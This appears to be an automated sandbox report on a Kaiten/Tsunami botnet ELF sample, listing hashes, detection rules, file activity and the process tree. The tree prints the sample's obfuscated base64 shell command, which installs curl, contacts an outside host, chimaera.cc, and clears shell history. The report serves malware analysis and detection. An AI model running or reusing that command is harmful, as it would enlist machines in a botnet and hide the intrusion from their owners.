kaiten | 0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6

General

Target

f09c0d5883a221d2e5f762480e946a78.elf
Size

42KB
MD5

f09c0d5883a221d2e5f762480e946a78
SHA1

506386147d393cef81019dda55ac85125914c6be
SHA256

0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6
SHA512

a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20
SSDEEP

768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+

Score

10^/10

kaiten botnet

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1546-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten2

Detects Kaiten/Tsunami payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1546-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Reads runtime system information 59 IoCs

Reads data from /proc virtual filesystem.

Processes:

iddpkgdpkgdpkgdpkgsystemctldpkgfindseddpkgdpkgdpkgdpkgdpkgdpkgdpkgdpkgdpkgseddpkgdpkgdpkgdpkgfindfindcpfinddpkgdpkgf09c0d5883a221d2e5f762480e946a78.elfdpkgdpkgcpapt-getseddpkgdpkgdpkgdpkgdpkgcpdpkgsedseddpkgcpdpkgdpkgdpkgseddpkgsedsed

description	ioc
File opened for reading	/proc/self/fd
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/exe	f09c0d5883a221d2e5f762480e946a78.elf
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/sys/kernel/ngroups_max	apt-get
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed

Writes file to tmp directory 48 IoCs

Malware often drops required files in the /tmp directory.

Processes:

apt-gettouchtouchapt-keytouchapt-keyapt-keytouchcpcpcpapt-keycp

description	ioc	process
File opened for modification	/tmp/fileutl.message.jEU2rO	apt-get
File opened for modification	/tmp/fileutl.message.ht0WOp	apt-get
File opened for modification	/tmp/fileutl.message.hXO3CC	apt-get
File opened for modification	/tmp/fileutl.message.0k9Blq	apt-get
File opened for modification	/tmp/apt.data.DDYK0c
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg	touch
File opened for modification	/tmp/fileutl.message.kkKKN8	apt-get
File opened for modification	/tmp/apt.sig.ghSisV
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/gpg.1.sh	apt-key
File opened for modification	/tmp/fileutl.message.4HyP9N	apt-get
File opened for modification	/tmp/fileutl.message.v1tq6c	apt-get
File opened for modification	/tmp/apt.conf.Lr0svM
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg	touch
File opened for modification	/tmp/apt.sig.J5nw5Q
File opened for modification	/tmp/apt.sig.Tm3bAK
File opened for modification	/tmp/apt.data.op1KVx
File opened for modification	/tmp/fileutl.message.kJNYTc	apt-get
File opened for modification	/tmp/fileutl.message.C9X3L0	apt-get
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.Ntmzin	apt-get
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/gpg.1.sh	apt-key
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/pubring.orig.gpg	cp
File opened for modification	/tmp/apt.conf.4YQd16
File opened for modification	/tmp/fileutl.message.WTkFrp	apt-get
File opened for modification	/tmp/fileutl.message.8snUvd	apt-get
File opened for modification	/tmp/fileutl.message.2L2UUO	apt-get
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg	apt-key
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/pubring.orig.gpg	cp
File opened for modification	/tmp/fileutl.message.OhixOM	apt-get
File opened for modification	/tmp/fileutl.message.XKz7hp	apt-get
File opened for modification	/tmp/fileutl.message.LvugNB	apt-get
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/pubring.orig.gpg	cp
File opened for modification	/tmp/apt.data.PxDrhB
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/gpg.1.sh	apt-key
File opened for modification	/tmp/fileutl.message.kJtl8B	apt-get
File opened for modification	/tmp/apt-key-gpghome.JW4YtzvHzt/pubring.orig.gpg	cp
File opened for modification	/tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg	apt-key
File opened for modification	/tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.hNJJw0	apt-get
File opened for modification	/tmp/fileutl.message.DIjed1	apt-get
File opened for modification	/tmp/apt.sig.mIS6Ku
File opened for modification	/tmp/apt-key-gpghome.YanZVww2GG/gpg.1.sh	apt-key
File opened for modification	/tmp/apt.conf.HvkBT6
File opened for modification	/tmp/apt.conf.CKeDeX
File opened for modification	/tmp/apt.data.S0foTJ
File opened for modification	/tmp/fileutl.message.PngA9W	apt-get

/tmp/f09c0d5883a221d2e5f762480e946a78.elf
/tmp/f09c0d5883a221d2e5f762480e946a78.elf
1⤵
- Reads runtime system information
PID:1546

/bin/sh
sh -c "echo aWYgISB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gaWYgdHlwZSBhcHQtZ2V0IDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGFwdC1nZXQgdXBkYXRlIC0tZml4LW1pc3NpbmcgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBhcHQtZ2V0IGluc3RhbGwgLXkgY3VybCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IGFwdC1nZXQgaW5zdGFsbCAteSAtLXJlaW5zdGFsbCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkKaWYgdHlwZSB5dW0gMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4geXVtIGNsZWFuIGFsbCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IHl1bSBpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyB5dW0gcmVpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBmaQppZiB0eXBlIGFwayAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbiBhcGsgdXBkYXRlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgYXBrIGFkZCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkgOyBmaSA7IGN1cmwgLXNMayBodHRwOi8vY2hpbWFlcmEuY2MvbG9nL2luZi5waHAgLW8gL2Rldi9udWxsIDsgaGlzdG9yeSAtYyA7IGNsZWFyCgo= | base64 -d | bash"
2⤵
PID:1547

/usr/bin/base64
base64 -d
3⤵
PID:1549

/bin/bash
bash
3⤵
PID:1550

/usr/bin/apt-get
apt-get update --fix-missing
4⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1551

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
5⤵
- Reads runtime system information
PID:1552

/usr/lib/apt/methods/http
/usr/lib/apt/methods/http
5⤵
PID:1553

/usr/lib/apt/methods/http
/usr/lib/apt/methods/http
5⤵
PID:1560

/usr/lib/apt/methods/http
/usr/lib/apt/methods/http
5⤵
PID:1561

/usr/lib/apt/methods/gpgv
/usr/lib/apt/methods/gpgv
5⤵
PID:1797

/usr/lib/apt/methods/gpgv
/usr/lib/apt/methods/gpgv
5⤵
PID:1798

/bin/sh
sh -c "[ ! -e /run/systemd/system ] || [ \$(id -u) -ne 0 ] || systemctl start --no-block apt-news.service esm-cache.service || true"
1⤵
PID:1555

/usr/bin/id
id -u
2⤵
- Reads runtime system information
PID:1556

/bin/systemctl
systemctl start --no-block apt-news.service esm-cache.service
2⤵
- Reads runtime system information
PID:1557

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.mIS6Ku /tmp/apt.data.DDYK0c
1⤵
- Writes file to tmp directory
PID:1800

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1802

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1803

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1804

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1805

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1806

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1807

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1808

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1809

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1810

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1811

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1812

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1813

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1815

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1816

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1817

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.YanZVww2GG
2⤵
PID:1818

/bin/readlink
readlink -f /tmp/apt-key-gpghome.YanZVww2GG
2⤵
PID:1819

/bin/rm
rm -f /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg
2⤵
PID:1820

/usr/bin/touch
touch /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1821

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1822

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1823

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1824

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1825

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1830

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1832

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1834

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1836

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1838

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1840

/bin/cp
cp -a /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg /tmp/apt-key-gpghome.YanZVww2GG/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1841

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.YanZVww2GG --keyring /tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.mIS6Ku /tmp/apt.data.DDYK0c
2⤵
PID:1848

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:1849

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:1850

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:1851

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:1852

/bin/rm
rm -rf /tmp/apt-key-gpghome.YanZVww2GG
2⤵
PID:1853

/usr/bin/sort
sort
1⤵
PID:1828

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1844

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1847

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.J5nw5Q /tmp/apt.data.PxDrhB
1⤵
- Writes file to tmp directory
PID:1855

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1857

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1858

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1859

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1860

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1861

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1862

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1863

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1864

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1865

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1866

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1867

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1868

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1870

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1871

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1872

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.JW4YtzvHzt
2⤵
PID:1873

/bin/readlink
readlink -f /tmp/apt-key-gpghome.JW4YtzvHzt
2⤵
PID:1874

/bin/rm
rm -f /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg
2⤵
PID:1875

/usr/bin/touch
touch /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1876

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1877

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1878

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1879

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1880

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1885

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1887

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1889

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1891

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1893

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1895

/bin/cp
cp -a /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1896

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.JW4YtzvHzt --keyring /tmp/apt-key-gpghome.JW4YtzvHzt/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.J5nw5Q /tmp/apt.data.PxDrhB
2⤵
PID:1903

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:1904

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:1905

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:1906

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:1907

/bin/rm
rm -rf /tmp/apt-key-gpghome.JW4YtzvHzt
2⤵
PID:1908

/usr/bin/sort
sort
1⤵
PID:1883

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1899

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1902

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.Tm3bAK /tmp/apt.data.op1KVx
1⤵
- Writes file to tmp directory
PID:1910

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1912

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1913

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1914

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1915

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1916

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1917

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1918

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1919

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1920

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1921

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1922

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1923

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1925

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1926

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1927

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.JWaRO2lmI1
2⤵
PID:1928

/bin/readlink
readlink -f /tmp/apt-key-gpghome.JWaRO2lmI1
2⤵
PID:1929

/bin/rm
rm -f /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg
2⤵
PID:1930

/usr/bin/touch
touch /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1931

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1932

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1933

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1934

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1935

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1940

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1942

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1944

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1946

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1948

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1950

/bin/cp
cp -a /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1951

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.JWaRO2lmI1 --keyring /tmp/apt-key-gpghome.JWaRO2lmI1/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.Tm3bAK /tmp/apt.data.op1KVx
2⤵
PID:1958

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:1959

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:1960

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:1961

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:1962

/bin/rm
rm -rf /tmp/apt-key-gpghome.JWaRO2lmI1
2⤵
PID:1963

/usr/bin/sort
sort
1⤵
PID:1938

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1954

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1957

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.ghSisV /tmp/apt.data.S0foTJ
1⤵
- Writes file to tmp directory
PID:1965

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1967

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1968

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1969

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1970

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1971

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1972

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1973

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1974

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1975

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1976

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1977

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1978

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1980

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1981

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1982

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.aQCzlyhCLU
2⤵
PID:1983

/bin/readlink
readlink -f /tmp/apt-key-gpghome.aQCzlyhCLU
2⤵
PID:1984

/bin/rm
rm -f /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg
2⤵
PID:1985

/usr/bin/touch
touch /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1986

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1987

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1988

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1989

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1990

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1995

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1997

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1999

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:2001

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:2003

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:2005

/bin/cp
cp -a /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2006

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.aQCzlyhCLU --keyring /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.ghSisV /tmp/apt.data.S0foTJ
2⤵
PID:2013

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:2014

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:2015

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:2016

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:2017

/bin/rm
rm -rf /tmp/apt-key-gpghome.aQCzlyhCLU
2⤵
PID:2018

/usr/bin/sort
sort
1⤵
PID:1993

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:2009

